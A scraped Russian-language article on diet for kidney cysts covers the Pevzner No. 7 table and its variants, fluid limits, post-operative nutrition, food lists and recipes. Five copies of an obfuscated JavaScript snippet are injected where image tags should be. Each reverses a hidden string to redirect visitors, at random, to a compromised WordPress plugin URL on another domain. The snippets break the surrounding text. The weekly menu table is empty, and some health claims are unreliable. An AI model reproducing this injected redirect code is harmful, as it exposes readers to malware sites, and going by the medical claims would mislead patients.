Киста почки — это капсулированное образование врождённого или приобретённого характера в структуре органа, заполненное содержимым различной консистенции. Если опухоль доброкачественная и не нарушает функцию почки, её не оперируют. Врач назначает консервативное лечение, частью которого является диета. В случае удаления кисты в послеоперационном периоде без диетического питания также не обойтись. Результат диеты зависит от правильно составленного меню и добросовестности соблюдения пациентом пищевых рекомендаций доктора.
Содержание
Необходимость и цель диеты при кисте почки
Вне зависимости от того, в какой части почки располагается киста, она затрагивает функциональные структуры. Это связано со сложным строением органа. Он состоит из коркового и мозгового вещества. Первое — это совокупность почечных телец (нефронов), а второе представлено почечными пирамидами. Нефроны отвечают за продукцию первичной и вторичной мочи (урины). Пирамиды распределяют и выводят продукты фильтрации в малые почечные чашечки, которые в свою очередь собирают жидкость в большие чашки. Последние выводят мочу в почечную лоханку — крупный резервуар почки, покидая который жидкость спускается в мочевой пузырь по мочеточнику. Кроме того, почка имеет развитую сосудистую сеть, включающую вены и артерии различного диаметра.
При малых размерах образования работа почки не нарушается. Пока здоровые нефроны и пирамиды преобладают, они компенсируют недоработку со стороны поражённых структур.
Расположение кисты определяет степень функциональных нарушений работы почки. Образование в паренхиме или области малой чашечки менее опасно, нежели таковое в просвете большой чашки или лоханки. Это связано с тем, что в одной почке 6–12 малых чашечек, а больших — не более четырёх. Лоханка вовсе одна, через неё проходит вся моча, которая производится. Чем крупнее структура перекрывается опухолью, тем сложнее урине продвигаться по органу и покидать его. Возможные осложнения — почечная гипертензия (повышение артериального давления), гидронефроз (расширение чашечно-лоханочной системы с последующим отмирание ткани почки), нефропатия (поражение сосудистого аппарата нефронов).
При бессимптомном течении кисты почки человеку достаточно придерживаться принципов рационального питания. Специальная диета назначается тогда, когда образование провоцирует нарушения в работе почек и всего организма.
Цель диеты — создать благоприятные условия для полноценной работы почки, чтобы предотвратить общие и локальные осложнения.
Лечебное питание: правила и принципы
При неосложнённой кисте почки с умеренно выраженной симптоматикой назначается диета №7 по Певзнеру.
Разработанная в 30-х годах прошлого столетья профессором М. И. Певзнером система диетических столов актуальна и сегодня. Каждая из пятнадцати диет применима для определённой группы заболеваний.
Принципы диеты №7:
- Снижение количества употребляемой соли до 5 граммов за сутки. В чистом виде это одна чайная ложка без горки. Такое ограничение обусловлено тем, что избыток соли ведёт к осложнённой работе почек и отёкам тела.
- Оптимизация соотношение в рационе белков, жиров и углеводов (1:1:2). Такой баланс позволяет организму получать всё необходимое без избыточной нагрузки на пищеварение. Рекомендованный суточный калораж — 2200–2400 ккал.
- Дробность питания. Пища должна поступать в организм 5–6 раз в день равномерными небольшими порциями, чтобы в течение дня нагрузка не только на почки, но и на желудок была равномерной.
$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2018/05/chasy-i-blyuda.jpg» alt=»часы и блюда» width=»510″ height=»404″ /> Важно питаться дробно, чтобы чувствовать себя хорошо и не перегружать органы выделения, в том числе почки
- Разнообразие пищевых ингредиентов и блюд позволит организму получать все необходимые витамины и минералы.
- Кулинарная обработка допускается разнообразная, за исключением копчения и засаливания. Не стоит злоупотреблять жареным, а от продуктов высокой степени прожарки лучше вовсе отказаться.
Откажитесь от полуфабрикатов и фастфуда. В таких продуктах не только много соли, но также присутствуют ароматизаторы, усилители вкуса, красители, обилие пряностей.
Диеты в зависимости от особенностей заболевания
Киста почки может протекать на фоне прочих заболеваний или провоцировать их появление. Тогда в силу вступают дополнительные рекомендации по питанию. Их разнообразие привело к появлению столов 7а, 7б, 7в и 7г, каждый из которых предусматривает ограничения в зависимости от сопутствующих недугов и патологических состояний.
Таблица: особенности столов 7а, 7б, 7в, 7г
Параметры диеты | Диета №7а | Диета №7б | Диета №7в | Диета №7г |
Показания к применению | Острая почечная недостаточность | Хроническая почечная недостаточность, нефрит лёгкой степени. Также назначают после диеты 7а при азотемии (повышенного содержания азота в крови) | Киста на фоне нефротического синдрома | Тотальная почечная недостаточность, в том числе на фоне опухоли, пациентам на гемодиализе |
Задачи | Максимальное снижение нагрузки на почки, выведение из организма азотистых веществ (продуктов обмена белка) | Устранение дефицита белка в организме, отёков тела, ликвидация протеинурии (белка в моче), снижение холестерина в крови | Насыщение организма больного необходимыми питательными веществами с минимальной выработкой побочных продуктов обмена | |
Длительность | Не более 20 дней | До нормализации содержания азота в крови либо до отмены доктором | До отмены в связи с нормализацией состояния | Пожизненно или до момента трансплантации почки |
Калорийность рациона в сутки | Не более 2200 ккал | До 2400 ккал | 2800 ккал | 3000 ккал |
Количество соли | Полностью исключается | 3–5 гр в сутки | Не более 2 гр | |
Количество белка | Не более 20 гр в сутки | До 40 гр | 120 гр, 65–70% из которых животного происхождения | Не более 60 гр в сутки |
Запрещается | Рыба и мясо любых сортов, бобовые, любые пряности, грибы, продукты с солью в составе | Жирные сорта мяса и рыбы, сдобные мучные изделия, блюда с грибами, бобами, отвары животного происхождения | Сахар в чистом виде, минимизировать употребление простых углеводов (их содержат различные сладости). Ограничить экстрактивные вещества (отвары) | Сводят к минимуму продукты, обогащённые калием (картофель, сухофрукты, орехи, лосось, шпинат, авокадо и пр.) и растительный белок |
Термическая обработка | Запекание, отваривание, приготовление на пару, лёгкое обжаривание | Предпочтительна отварная, запечённая, приготовленная на пару пища | Отваривание | |
Количество приёмов пищи | 4–5 | 5–6 | 6 раз, дробно |
Питьевой режим
Если установлено наличие кисты почки, но симптомы отсутствуют, можно не ограничивать количество употребляемой жидкости. Исключите алкоголь, газированную воду, напитки с ароматизаторами и красителями, особенно энергетические.
В случае проявлений, которые говорят о прогрессировании заболевания (отёки, повышение цифр АД, рост опухоли, присоединение воспалительного процесса, плохие результаты анализов), необходимо сократить количество жидкости до полутора литров за сутки с целью снижения нагрузки на почки. Рекомендация дополняет диету №7.
Диета 7а предполагает более жёсткие ограничения — не боле 0,5 л жидкости в сутки.
Стол 7б допускает повышение количества жидкости на 100 мл по сравнению с 7а.
При диетах 7в и 7г больному запрещено употреблять более 0,7–0,8 л.
Почечные отёки формируются ночью и более заметны утром, поэтому за несколько часов до сна употребление жидкости сведите к минимуму.
Диетический стол после удаления кисты
Устранение кисты производится несколькими способами, которые предполагают различный объём вмешательства. Подход к диете в постоперационном периоде также отличается:
- Пункционная склеротерапия — проводится для простых кист под местной анестезией. В области поясницы специальной иглой делается прокол, содержимое опухоли выкачивается, а затем вводится склеивающее стенки образования вещество. Процедура не требует специальных диет, кроме общепринятого рационального питания.
- Лапороскопическое удаление кисты делается под кратковременной общей анестезией через небольшие надрезы, в которые вводят инструментарий. Извлекаются малые, крупные однокамерные, многокамерные кисты среднего размера. Вмешательство малоинвазивное, поэтому больной проводит в стационаре 2–3 дня. В первые сутки после операции разрешается пить небольшими глотками (не более 0,5 л воды). На второй день вводят лёгкую полужидкую еду — нежирный кефир, йогурт, куриный бульон, картофельный отвар. В течение недели рацион постепенно расширяется. Сначала разрешают протёртые супы, затем пюреобразные блюда. Допустимо употребление не более 5 граммов соли в день. Спустя неделю врач рекомендует седьмой стол как минимум на месяц.
$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2018/05/tarelki-s-edoy-na-podnose.jpg» alt=»тарелки с едой на подносе» width=»700″ height=»523″ /> Диетическое питание после удаления кисты почки необходимо с целью профилактики послеоперационных осложнений
- Открытая операция по иссечению кисты осуществляется при крупных размерах образования, которое охватывает значительную часть почки. Вмешательство сложное и травматичное, поэтому больной проводит в стационаре не менее недели. Питание в первые 7 дней такое же, как в предыдущем случае, но впоследствии пациенту рекомендуется диета №7 сроком на 6–12 месяцев.
- Открытое вмешательство с односторонней нефрэктомией (удалением почки) — отличается в плане питания тем, что почечная диета необходима пожизненно. Человек должен помнить, что вся функция мочевыделения ложится на оставшийся орган, поэтому его нужно щадить. В случае угрозы почечной недостаточности больной придерживается диеты 7а, при развитии нефрита оставшейся почки необходим стол 7б.
Диетическое питание после любой операции по удалению кисты почки поможет не набрать лишний вес. Это важно ввиду того, что в первые несколько месяцев доктор назначает щадящий двигательный режим.
Таблица: разрешённые и запрещённые продукты
Продукты | Разрешается | Запрещается |
Крупы | Любые, но предпочтение гречневой и овсяной | |
Овощи | Огурцы, помидоры, болгарский перец (ограниченно), капуста пекинская. При термической обработке — любые овощи, но с ограничением тех, в которых много красящих веществ (свёкла, морковь) | В сыром виде — лук, чеснок, редис, острый перец |
Зелень | Укроп, петрушка, листья салата, базилик, шпинат в готовом и сыром виде | |
Бобовые | Запрещены | |
Макаронные изделия | Из твёрдых сортов | Из муки высшего сорта |
Фрукты | Яблоко, груша, дыня, арбуз. Банан, лимон, виноград — ограниченно. | Цитрусовые, ананас, кислые фрукты |
Ягоды | Смородина, малина, брусника, клюква, черника | |
Грибы | Запрещены | |
Рыба, морепродукты | Нежирная рыба, морепродукты в небольшом количестве | Жирные сорта рыбы |
Мясо | Нежирные сорта (мясо курицы, индюшка, кролика, перепёлки, телятины — изредка) | Жирное мясо (свинина, баранина, утка, гусь) |
Яйца | Куриные — одно в сутки, перепелиные — 1–3 в день | |
Молочные продукты | Кефир, творог, молоко с низким процентом жирности (не более 1%), нежирная сметана | Плавленый, копчёный, солёный сыр, цельное молоко, сливки |
Выпечка | Овсяное и галетное печенья, сушки, хлеб с отрубями, из овсяной и кукурузной муки | Сдоба, изделия из муки высшего сорта с сахаром |
Первые блюда | Овощные отвары | Мясные, рыбные, грибные бульоны |
Масла | Растительные: оливковое, льняное, подсолнечное рафинированное | Спред, сливочное масло, маргарин |
Орехи | Запрещены | |
Сухофрукты | Любые в небольшом количестве | |
Сладости | Натуральный мармелад и зефир, мёд, домашние сладкие варенья | Пирожные, конфеты, шоколад, сахарозаменители, сахар |
Напитки | Компоты из свежих ягод и фруктов, кисели, ягодный морс, некрепкий или травяной чай, хлоридно-кальциевая минеральная вода без газа, отвар шиповника, травяные сборы (после разрешения врача) | Газированные напитки, томатный и цитрусовый соки, кофе, чай, алкоголь |
Консервы | Запрещены | |
Полуфабрикаты, фастфуд, колбасы, соления, копчёности | Запрещены | |
Специи | В ограниченном количестве натуральные сушёные травы — базилик, укроп, паприка, лимонная цедра и другие | Комплексные приправы с усилителями вкуса, солью, ароматизаторами искусственного происхождения |
Соусы, кетчуп, майонез | Запрещены |
Фотогалерея: опасная еда при кисте почки
- Киста в любой части почки способна нарушить полноценную работу органа, поскольку обязательно затронет одну из функциональных структур
- Поперечные разрезы на курином филе делаются аккуратно, чтобы не разделить его на части
- Готовое куриное филе с помидорами и натуральными пряностями имеет приятный аромат и нежный вкус
- Фаршировать куриное филе лучше сразу на фольге, чтобы не растерять овощи при переносе на противень
- Овощное блюдо из картофеля и кабачков актуально в летний период
- Запечённый тунец — диетическое блюдо, богатое микроэлементами и полезным белком, который легко усваивается
- Бобовые культуры полезны, но не для тех, у кого проблемы с почками, поскольку растительный белок усваится с образованием большого количества азота
- Нельзя употреблять не только консервацию, купленную в магазине, но также домашнюю, поскольку в ней много соли
- Грибы любого происхождения вне зависимости от кулинарной обработки при болезнях почек под запретом, поскольку даже здоровый организм справляется с ними плохо
- При кисте почки употребление сливочного масла нежелательно, а спред под запретом навсегда, поскольку в нём присутствуют жиры-трансизомеры низкой плотности
- Полуфабрикаты не всегда делаются из качественного сырья, зато в них много соли, пряностей и вредных жиров
- Углекислый газ в газированной воде способствует нарушению переноса кислорода кровью к органам, а красители затрудняют работу почек
- Быстрая еда содержит много калорий и пищевых добавок различного происхождения
- Если врач ограничил суточное потребление жидкости до минимума, пользуйтесь ёмкостями, которые позволят чётко определить количество выпито
- Чайная ложка соли — это немало, если солить готовую еду порционно
- Важно питаться дробно, чтобы чувствовать себя хорошо и не перегружать органы выделения, в том числе почки
- Диетическое питание после удаления кисты почки необходимо с целью профилактики послеоперационных осложнений
- Травы обладают лечебными свойствами, поэтому сборы и настои нужно употреблять, но после врачебной консультации
- Морская рыба обогащает организм полезными белками, йодом, жирными кислотами
- Морсы из ягод богаты витаминами, а также обладают противовоспалительными свойствами
- Крупы содержат много клетчатки, которая сорбирует в кишечнике излишнюю жидкость и токсины
- Если киста почки вызывает осложнения и неприятные симптомы, без специальной диеты не обойтись
Ежедневное питание
Чтобы ежедневное питание не казалось однообразным, следует составлять меню на неделю вперёд.
Таблица: примерное меню на неделю при кисте почки (на основе стола №7)
Понедельник | Вторник | Среда | Четверг | Пятница | Суббота | Воскресение | |
Первый завтрак |
|
|
|
|
|
|
|
Второй завтрак |
|
|
|
|
|
|
|
Обед |
|
|
|
|
|
|
|
Полдник |
|
|
|
|
|
|
|
Ужин |
|
|
|
|
|
|
|
Каждую неделю можно составлять новое меню или менять его составляющие в зависимости от наличия сезонных ягод, овощей и фруктов.
Фотогалерея: блюда и продукты, незаменимые для больных с кистой почки
- Киста в любой части почки способна нарушить полноценную работу органа, поскольку обязательно затронет одну из функциональных структур
- Поперечные разрезы на курином филе делаются аккуратно, чтобы не разделить его на части
- Готовое куриное филе с помидорами и натуральными пряностями имеет приятный аромат и нежный вкус
- Фаршировать куриное филе лучше сразу на фольге, чтобы не растерять овощи при переносе на противень
- Овощное блюдо из картофеля и кабачков актуально в летний период
- Запечённый тунец — диетическое блюдо, богатое микроэлементами и полезным белком, который легко усваивается
- Бобовые культуры полезны, но не для тех, у кого проблемы с почками, поскольку растительный белок усваится с образованием большого количества азота
- Нельзя употреблять не только консервацию, купленную в магазине, но также домашнюю, поскольку в ней много соли
- Грибы любого происхождения вне зависимости от кулинарной обработки при болезнях почек под запретом, поскольку даже здоровый организм справляется с ними плохо
- При кисте почки употребление сливочного масла нежелательно, а спред под запретом навсегда, поскольку в нём присутствуют жиры-трансизомеры низкой плотности
- Полуфабрикаты не всегда делаются из качественного сырья, зато в них много соли, пряностей и вредных жиров
- Углекислый газ в газированной воде способствует нарушению переноса кислорода кровью к органам, а красители затрудняют работу почек
- Быстрая еда содержит много калорий и пищевых добавок различного происхождения
- Если врач ограничил суточное потребление жидкости до минимума, пользуйтесь ёмкостями, которые позволят чётко определить количество выпито
- Чайная ложка соли — это немало, если солить готовую еду порционно
- Важно питаться дробно, чтобы чувствовать себя хорошо и не перегружать органы выделения, в том числе почки
- Диетическое питание после удаления кисты почки необходимо с целью профилактики послеоперационных осложнений
- Травы обладают лечебными свойствами, поэтому сборы и настои нужно употреблять, но после врачебной консультации
- Морская рыба обогащает организм полезными белками, йодом, жирными кислотами
- Морсы из ягод богаты витаминами, а также обладают противовоспалительными свойствами
- Крупы содержат много клетчатки, которая сорбирует в кишечнике излишнюю жидкость и токсины
- Если киста почки вызывает осложнения и неприятные симптомы, без специальной диеты не обойтись
Рецепты
Почечная диета допускает употребление широкого спектра продуктов, из которых можно создавать полезные и вкусные блюда. Следующие рецепты предполагают использование доступных продуктов и простой способ приготовления.
Куриная грудка, запечённая с помидорами и луком
Ингредиенты (1 порция):
- куриное филе без кости (1/2 грудки) — 1 шт.;
- помидор свежий — 1–2 шт.;
- лук репчатый — 1 шт.;
- сметана — 2 ст. ложки;
- сушёный укроп, петрушка, щепотка соли;
- листья салата.
Приготовление:
- В углублённой ёмкости смешать сметану, петрушку, укроп и соль.
- Филе куриное очистить от шкурки (если есть), сделать поперечные разрезы на половину глубины мяса.
$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2018/05/file-kuricy-s-razrezami.png» alt=»филе куриное с разрезами» width=»600″ height=»370″ /> Поперечные разрезы на курином филе делаются аккуратно, чтобы не разделить его на части
- Погрузить филе в сметанный маринад, полностью обмазать им мясо, затем оставить его мариноваться на 15–20 минут.
- Лук и помидоры нарезать полукольцами.
- Выложить филе на противень, покрытый фольгой.
- В каждый разрез вложить по кусочку лука и помидора.
$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2018/05/file-na-folge.jpg» alt=»филе на фольге» width=»552″ height=»331″ /> Фаршировать куриное филе лучше сразу на фольге, чтобы не растерять овощи при переносе на противень
- Завернуть филе в фольгу и поставить в предварительно разогретую до 180о С духовку.
- Запекать 15–20 минут (в зависимости от размера).
- Готовое мясо выложить на тарелку, предварительно украшенную листьями салата.
$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2018/05/gotovoe-farshirovannoe-kurinoe-file.jpg» alt=»готовое фаршированное куриное филе» width=»600″ height=»353″ /> Готовое куриное филе с помидорами и натуральными пряностями имеет приятный аромат и нежный вкус
Картофель с кабачками
Ингредиенты:
- картофель — 2–3 шт.;
- кабачок 1–2 шт.;
- небольшой лук-порей или головка репчатого;
- сметана — 150–200 г;
- щепотка соли;
- немного чёрного перца, сушёный базилик.
Приготовление:
- Картофель нарезать кубиками среднего размера, слегка обжарить на рафинированном масле, засыпать в котелок.
- Нарезать мелко лук-порей и посыпать картошку сверху. Если используете репчатый лук, припустите его на сковороде.
- Кабачки также нарезать кубиками, немного поджарить и насыпать поверх лука.
- Добавить 400–450 мл воды.
- Тушить 10 минут после закипания.
- Полить сметаной и потушить ещё 5 минут.
- Соль и травы добавить перед подачей блюда к столу.
Чтобы вкус блюда был более нежным, используйте кабачки золотистого цвета, цукини или патиссоны.
Тунец с луком
Ингредиенты:
- тунец среднего размера — 1 шт.;
- лук репчатый средний — 1 шт.;
- сметана — небольшая упаковка;
- соль;
- натуральные специи.
Этапы приготовления:
- Очистить и выпотрошить рыбу, отрезать голову.
- Тушку порезать на равномерные небольшие кусочки.
- Лук порезать полукольцами, добавить миску с рыбой.
- Сверху посыпать специями, солью, полить сметаной.
- Перемешать и поставить рыбу мариноваться на 60 минут в холодильник.
- Выложить кусочки рыбы на предварительно смазанный растительным маслом противень, сверху посыпать луком.
- Запекать при температуре 180о 40 минут.
Видео: простой рецепт запечённого тунца
Результат диеты
Когда пациент с кистой почки начинает придерживаться рекомендованной диеты, его самочувствие быстро улучшается. Уменьшаются либо исчезают отёки. Если есть болевой синдром — он полностью уходит или беспокоит человека реже. Пациенты с избыточным весом постепенно теряют лишние килограммы, за счёт чего их жизнь становится легче. При склонности к артериальной гипертензии диетическое питание позволяет немного снизить показатели артериального давления за счёт того, что жидкость быстрее выводится, а значит не увеличивает объём циркулирующей крови.
Но диета не всегда способна избавить больного от осложнений и дискомфортной симптоматики, особенно при огромных размерах образования и склонности его к озлокачествлению. В таком случае опухоль удаляется. Затем следует послеоперационный период, во время которого также требуется правильное питание. Здоровая пища снижает риск развития осложнений в несколько раз. Сокращается восстановительный период повреждённых во время операции тканей.
Правильно подобранная диета при кисте почки — важная составляющая в терапии недуга. Оптимальной считается диета №7, учитывающая особенности заболевания и необходимость организма в полноценном питании. При осложнениях кистоза с нарушением функции почек рекомендуются разновидности седьмого стола, которые зависят от клинической картины. Меню составляется согласно общих рекомендаций, но индивидуально для каждого больного. Человеку следует освоить рецепты простых блюд из разрешённых продуктов. Если нужна коррекция питания по состоянию здоровья — обращайтесь за консультацией к лечащему врачу.